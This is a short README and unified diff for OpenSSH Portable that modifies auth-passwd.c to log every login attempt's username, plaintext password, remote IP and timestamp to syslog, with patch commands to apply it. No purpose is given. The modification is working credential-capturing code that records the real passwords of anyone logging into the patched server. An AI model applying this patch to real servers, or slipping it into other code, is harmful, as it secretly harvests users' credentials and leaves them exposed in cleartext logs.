Patch for OpenSSH Portable to log usernames, passwords and IPs
Written by Brad Tilley <brad@w8rbt.org>

Tested on:

    OpenSSH 5.3p1 - OpenSSH 7.3p1
    May apply to older versions.

To apply:

    patch --dry-run < sshlog.patch
    patch < sshlog.patch

--- auth-passwd.c	2016-07-27 22:54:27.000000000 +0000
+++ auth-passwd-w8rbt.c	2016-11-18 15:03:03.430646474 +0000
@@ -85,6 +85,13 @@
 {
 	struct passwd * pw = authctxt->pw;
 	int result, ok = authctxt->valid;
+
+        struct ssh *ssh = active_state;
+        logit("sshlog: %s %s %s %lu", authctxt->user,
+                                      password,
+                                      ssh_remote_ipaddr(ssh),
+                                      (unsigned long)time(NULL));
+
 #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
 	static int expire_checked = 0;
 #endif
